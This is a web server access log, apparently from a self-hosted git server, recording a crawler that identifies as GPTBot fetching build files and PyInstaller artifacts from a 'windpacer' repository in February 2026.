"/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17965] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:16:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 49762] [Gzip 27.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:16:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70930] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13545] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" -[17/Feb/2026:16:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 71200] [Gzip 17.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 158884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:16:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13684] [Gzip 6.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11618] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:16:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 72071] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17055] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:16:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 70890] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10218] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:16:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 99687] [Gzip 29.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:16:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:16:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:16:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:16:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 13192922] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:16:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:16:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 100066] [Gzip 29.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:16:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 101228] [Gzip 29.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:16:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 158884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:16:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:16:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:16:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 160535] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:16:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:16:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15176] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr 